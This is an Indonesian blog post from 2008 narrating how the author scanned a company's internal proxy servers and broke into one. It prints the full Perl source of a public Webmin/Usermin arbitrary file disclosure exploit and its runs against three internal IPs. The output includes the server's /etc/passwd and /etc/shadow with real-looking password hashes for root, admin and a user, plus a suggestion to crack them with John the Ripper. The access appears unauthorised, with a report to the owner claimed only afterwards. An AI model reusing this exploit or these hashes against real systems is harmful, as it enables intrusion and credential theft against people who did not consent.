Sunday, January 27, 2008

ISENG-ISENG MENGINTIP DENGAN WEBMIN ARBITARY REMOTE FILE DISCLOSURE

ISENG-ISENG MENGINTIP DENGAN WEBMIN ARBITARY REMOTE FILE DISCLOSURE
By thesims
Published: January 13, 2008
Print Email

Hmm pagi-pagi seperti biasa … pergi ke kantor pake motor , motor ini sebagai 3 tahun perjuangan gw sampe gw bisa bekerja di salah satu perusahaan walau gw Cuma outsource itulah aktifitas gw huh hari libur gw masuk kebetulan ronda pagi … sampe kantor iseng-iseng oprek server buatan sendiri walhasil mayan deh kegunaannya mulai dari simpen-simpen file buat remote-remote ke network sampe buat mp3 streaming huh daripada idle tuh server, gw nyalain kompie gw coba ngenet aahhh ternyata gateway nya down kesel … mana gw lagi butuh buat browsing gipula neh akses drop semua … iseng-iseng gw traceroute wah ternyata bukan di hop si gateway server melainkan routing kearah luar alias ip publik , inget banget gw neh pake router cisco … ahh gw cuekin aja dulu deh masalah layer 3 ini , beralih ke layer 7 dulu…
Keabisan ide gw kepala mikir-dan mikir apa ya kayaknya ada kejanggalan ohh iyaaa !!! seperti ada lampu neon dikepala gw , dulu pernah ada temen bilang pake aja bal proxy.sibiru.co.id ..
Hmm isengiseng gw mo tau nih proxy resolv kemana ya ….

Neh hasil nya

[iqbal@boc ~]$ dig proxies.sibiru.co.id

; <<>> DiG 9.3.3rc2 <<>> proxies.sibiru.co.id
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6317
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 4, ADDITIONAL: 3

;; QUESTION SECTION:
;proxies.sibiru.co.id. IN A

;; ANSWER SECTION:
proxies.sibiru.co.id. 384 IN A 10.1.10.19
proxies.sibiru.co.id. 384 IN A 10.1.10.17
proxies.sibiru.co.id. 384 IN A 10.1.10.18

;; AUTHORITY SECTION:
sibiru.co.id. 384 IN NS ns.sibiru.co.id.
sibiru.co.id. 384 IN NS ns0.sibiru.co.id.
sibiru.co.id. 384 IN NS ldap.sibiru.co.id.
sibiru.co.id. 384 IN NS pusren01.risti.sibiru.co.id.

;; ADDITIONAL SECTION:
ns.sibiru.co.id. 384 IN A 10.2.1.5
ns0.sibiru.co.id. 384 IN A 10.2.12.12
ldap.sibiru.co.id. 384 IN A 10.1.2.38

;; Query time: 3 msec
;; SERVER: 10.11.15.220#53(10.11.15.220)
;; WHEN: Sun Jan 13 20:57:32 2008
;; MSG SIZE rcvd: 217


Nah lihat yang dicetak tebal …. Ada 3 server nih gw coba test ping dulu mana yang reply

[iqbal@boc ~]$ ping 10.1.10.19
PING 10.1.10.19 (10.1.10.19) 56(84) bytes of data.
64 bytes from 10.1.10.19: icmp_seq=1 ttl=60 time=26.1 ms
64 bytes from 10.1.10.19: icmp_seq=2 ttl=60 time=25.4 ms
64 bytes from 10.1.10.19: icmp_seq=3 ttl=60 time=25.9 ms
64 bytes from 10.1.10.19: icmp_seq=4 ttl=60 time=25.7 ms
64 bytes from 10.1.10.19: icmp_seq=5 ttl=60 time=25.3 ms
64 bytes from 10.1.10.19: icmp_seq=6 ttl=60 time=25.5 ms

--- 10.1.10.19 ping statistics ---
6 packets transmitted, 6 received, 0% packet loss, time 5000ms
rtt min/avg/max/mdev = 25.383/25.711/26.199/0.291 ms
[iqbal@boc ~]$ ping 10.1.10.17
PING 10.1.10.17 (10.1.10.17) 56(84) bytes of data.
64 bytes from 10.1.10.17: icmp_seq=1 ttl=60 time=25.4 ms
64 bytes from 10.1.10.17: icmp_seq=2 ttl=60 time=26.6 ms
64 bytes from 10.1.10.17: icmp_seq=3 ttl=60 time=25.4 ms
64 bytes from 10.1.10.17: icmp_seq=4 ttl=60 time=25.5 ms
64 bytes from 10.1.10.17: icmp_seq=5 ttl=60 time=25.1 ms

--- 10.1.10.17 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 3998ms
rtt min/avg/max/mdev = 25.160/25.677/26.693/0.565 ms
[iqbal@boc ~]$ ping 10.1.10.18
PING 10.1.10.18 (10.1.10.18) 56(84) bytes of data.
64 bytes from 10.1.10.18: icmp_seq=1 ttl=60 time=25.6 ms
64 bytes from 10.1.10.18: icmp_seq=2 ttl=60 time=25.7 ms
64 bytes from 10.1.10.18: icmp_seq=3 ttl=60 time=25.2 ms
64 bytes from 10.1.10.18: icmp_seq=4 ttl=60 time=25.7 ms
64 bytes from 10.1.10.18: icmp_seq=5 ttl=60 time=25.4 ms
64 bytes from 10.1.10.18: icmp_seq=6 ttl=60 time=25.4 ms

--- 10.1.10.18 ping statistics ---
6 packets transmitted, 6 received, 0% packet loss, time 5000ms
rtt min/avg/max/mdev = 25.298/25.565/25.760/0.218 ms


Wow keren … semua nya reply berarti proxynya gw tinggal cari nih port proxynya berikut hasil scan port yang gw lakukan

[iqbal@boc ~]$ nmap 10.1.10.17-19

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2008-01-13 21:06 WIT
Interesting ports on 10.1.10.17:
Not shown: 1673 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
6000/tcp filtered X11
8080/tcp open http-proxy
8443/tcp open https-alt
10000/tcp open snet-sensor-mgmt

Interesting ports on 10.1.10.18:
Not shown: 1672 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
654/tcp open unknown
669/tcp open unknown
744/tcp open flexlm
6000/tcp open X11
8080/tcp open http-proxy
10000/tcp open snet-sensor-mgmt

Interesting ports on 10.1.10.19:
Not shown: 1671 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
111/tcp open rpcbind
698/tcp open unknown
713/tcp open unknown
841/tcp open unknown
6000/tcp open X11
8080/tcp open http-proxy
10000/tcp open snet-sensor-mgmt

Nmap finished: 3 IP addresses (3 hosts up) scanned in 29.547 seconds

Wah diotak gw makin tanda tanya kayaknya 10000 itu untuk webmin ya , padahal gw Cuma cari proxy aja loh… kebeneran deh sekalian gw pengen tau juga apakah ada hole nya tuh server. Usut punya usut ketemu di website http://www.milw0rm.com/exploits/2017 gw copy paste deh tuh jadi file webmin.pl berikut deh exploit webminnya


[iqbal@boc expl]$ cat webmin.pl
#!/usr/bin/perl
# Exploit for WEBMIN and USERMIN less than 1.29x
# ARBITARY REMOTE FILE DISCLOSURE
# WORKS FOR HTTP AND HTTPS (NOW)
# Thrusday 13th July 2006
# Vulnerability Disclosure at securitydot.net
# Coded by UmZ! umz32.dll@gmail.com
#
#
#
# Make sure you have LWP before using this exploit.
# USE IT AT YOUR OWN RISK
#
# GREETS to wiseguy, Anonymous Individual, Uquali......Jhant... Fakhru... etc........................
# for other.. like AHMED n FAIZ ... (GET A LIFE MAN).



# Revised on Friday 14th July 2006
use LWP::Simple;
use LWP::UserAgent;
my $userag = LWP::UserAgent->new;

if (@ARGV < 4) {
print("Usage: $0 ");
print("TARGETS are ");
print("0 - > HTTP ");
print(" 1 - > HTTPS ");
print("Define full path with file name ");
print("Example: ./webmin.pl blah.com 10000 /etc/passwd ");
exit(1);
}

($target, $port,$filename, $tar) = @ARGV;

print("WEBMIN EXPLOIT !!!!! coded by UmZ! ");
print("Comments and Suggestions are welcome at umz32.dll [at] gmail.com ");
print("Vulnerability disclose at securitydot.net I am just coding it in perl 'cuz I hate PHP! ");
print("Attacking $target on port $port! ");
print("FILENAME: $filename ");


$temp="/..%01" x 40;

if ($tar == '0')
{ my $url= "http://". $target. ":" . $port ."/unauthenticated/".$temp . $filename;
$content=get $url;

print(" FILE CONTENT STARTED");
print(" ----------------------------------- ");

print("$content");
print(" ------------------------------------- ");
}


elsif ($tar == '1')
{
my $url= "https://". $target. ":" . $port ."/unauthenticated/".$temp . $filename;
my $req = HTTP::Request->new(GET => $url);
my $res = $userag->request($req);
if ($res->is_success) {
print("FILE CONTENT STARTED ");
print("------------------------------------------- ");
print $res->as_string;
print("------------------------------------------- ");
}
else {
print "Failed: ", $res->status_line, " ";
}
}

# milw0rm.com [2006-07-15]

[iqbal@boc expl]$ perl webmin.pl 10.1.10.18 10000 /etc/shadow 1
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.1.10.18 on port 10000!
FILENAME: /etc/shadow
Failed: 404 File not found

Gagal nih

[iqbal@boc expl]$ perl webmin.pl 10.1.10.19 10000 /etc/shadow 1
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.1.10.19 on port 10000!
FILENAME: /etc/shadow
Failed: 404 File not found

Hasil diatas juga gagal

[iqbal@boc expl]$ perl webmin.pl 10.1.10.17 10000 /etc/passwd 1
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.1.10.17 on port 10000!
FILENAME: /etc/passwd
FILE CONTENT STARTED
-------------------------------------------
HTTP/1.0 200 Document follows
Connection: close
Date: Fri, 11 Jan 2008 06:42:31 GMT
Server: MiniServ/0.01
Content-Length: 1190
Content-Type: text/plain
Last-Modified: Tue, 20 Jun 2006 08:38:14 GMT
Client-Date: Fri, 11 Jan 2008 03:13:02 GMT
Client-Peer: 10.1.10.17:10000
Client-Response-Num: 1
Client-SSL-Cert-Issuer: /O=Webmin Webserver on localhost/CN=*/emailAddress=root@localhost
Client-SSL-Cert-Subject: /O=Webmin Webserver on localhost/CN=*/emailAddress=root@localhost
Client-SSL-Cipher: AES256-SHA
Client-SSL-Warning: Peer certificate not verified

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/sbin:/bin/sh
adm:x:3:4:adm:/var/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/bin/sh
news:x:9:13:news:/var/spool/news:/bin/sh
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
nobody:x:65534:65534:Nobody:/:/bin/sh
rpm:x:13:101:system user for rpm:/var/lib/rpm:/bin/false
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:70:70:system user for portmap:/:/bin/false
xfs:x:71:71:system user for XFree86:/etc/X11/fs:/bin/false
postfix:x:72:72:system user for postfix:/var/spool/postfix:/bin/false
rpcuser:x:73:73:system user for nfs-utils:/var/lib/nfs:/bin/false
squid:x:74:74:system user for squid:/var/spool/squid:/bin/false
sshd:x:75:75:system user for openssh:/var/empty:/bin/true
admin:x:501:501:admin:/home/admin:/bin/bash
apache:x:76:76:system user for apache2:/var/www:/bin/sh
mysql:x:77:77:system user for MySQL:/var/lib/mysql:/bin/bash
iscan:x:503:503::/:/bin/false
bowo:x:505:505::/home/bowo:/bin/bash
bayu:x:506:506:Ariya Bayu:/home/bayu:/bin/bash

Wah masuk tuh ……… I got u …………..

[iqbal@boc expl]$ perl webmin.pl 10.1.10.17 10000 /etc/shadow 1
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.1.10.17 on port 10000!
FILENAME: /etc/shadow
FILE CONTENT STARTED
-------------------------------------------
HTTP/1.0 200 Document follows
Connection: close
Date: Fri, 11 Jan 2008 06:43:22 GMT
Server: MiniServ/0.01
Content-Length: 800
Content-Type: text/plain
Last-Modified: Sun, 25 Jun 2006 15:03:50 GMT
Client-Date: Fri, 11 Jan 2008 03:13:51 GMT
Client-Peer: 10.1.10.17:10000
Client-Response-Num: 1
Client-SSL-Cert-Issuer: /O=Webmin Webserver on localhost/CN=*/emailAddress=root@localhost
Client-SSL-Cert-Subject: /O=Webmin Webserver on localhost/CN=*/emailAddress=root@localhost
Client-SSL-Cipher: AES256-SHA
Client-SSL-Warning: Peer certificate not verified

root:$1$0R.FZtLM$WlBgN6.5NKBN7OafXgqNQ/:12887:0:99999:7:::
bin:*:12515:0:99999:7:::
daemon:*:12515:0:99999:7:::
adm:*:12515:0:99999:7:::
lp:*:12515:0:99999:7:::
sync:*:12515:0:99999:7:::
shutdown:*:12515:0:99999:7:::
halt:*:12515:0:99999:7:::
mail:*:12515:0:99999:7:::
news:*:12515:0:99999:7:::
uucp:*:12515:0:99999:7:::
nobody:*:12515:0:99999:7:::
rpm:!!:12515:0:99999:7:::
vcsa:!!:12515:0:99999:7:::
rpc:!!:12515:0:99999:7:::
xfs:!!:12515:0:99999:7:::
postfix:!!:12515:0:99999:7:::
rpcuser:!!:12515:0:99999:7:::
squid:!!:12515:0:99999:7:::
sshd:!!:12515:0:99999:7:::
admin:$1$lUbNGfKl$4/v4BWtT5bHGD.VDHa6cN/:12887:0:99999:7:::
apache:!!:12515:0:99999:7:::
mysql:!!:12515:0:99999:7:::
iscan:!!:12516:0:99999:7:::
bowo:$1$1I4B/3.T$tmnE.Za1kqrM5y8QGLYmS.:12550:0:99999:7:::
bayu:!!:12848:0:99999:7:::


Ternyata si 10.1.10.17 ada holenya di webmin … wah bisa intip /etc/passwd /etc/shadow … hmm awalnya cari proxy malah ketemu begini ahh sudahlah gw copy paste aja tuh /etc/passwd dan /etc/shadow… mungkin suatu saat berguna … dan mayan deh bisa intip … besoknya gw report masalah ini ke si empunya ternyata dibales deh …. walaupun bisa dioprek dengan john the ripper atau cari slocate.db ( cari *.conf plain text password ) hihiihhi

Thanks to : Allah SWT … , Cyberlog : Sori baru bisa kirim artikel nih walaupun cuma begini aja gw doain semoga istri lo sehat walafiat … , AdhietSlank : Gimana kabar si doi lo kan jadi nikah gan tuh buru nikah deh lo , k1nk0n9 : yang masih sibuk ama kerjaan barunya yeh makan-makannya mana nih … , Fl3xu5 : masih sibuk ama kulnya yeh … terus belajar bos jangan patah semangat , Sukam : dimana kau cok kapan kita ketemu lagi lay … , Ariee & Rini : Thanks support dan dukungannya semoga anak lo menjadi anak yang berguna map belum sempet ketemu si kecil and Ariee BTS ama badan lo beratan badan lo heheheh … A-technique : Sori SOB gw lom sempet ke depok lagi … by ym an aja wit hehehe , Jantap : Hhehee Manager lapangan : banyak ilmunya neh orang mengenai perhitungan BTS sukses terus … Letjen : sekolah hokum Cuma hobi computer nyambung juga jadi pengacara gw nih … gratisan ya … sukses buat semua , ibnu : kirim daku pyramid donk sekalian juga spinx nnya yaaaaaa …….. , z3r0byt3 : gimana pak masih ngajar kah di bekasi ntar kapan mau kerumah situ minta pencerahan , temen-temen kantor BOC : lets handling it okay , salam TheSimS aka Iqbal@sekuritionline.net


Nb :

Mohon maaf jika ada pihak yang dirugikan karena tujuan ini sebagai pembelajaran dan bukan tujuan untuk memanfaatkan sebuah kelemahan system dan sifatnya tidak untuk menjatuhkan dan buat admin rajin-rajin aja patching systemnya tuh webminnya ada hole tuh

No comments:

Post a Comment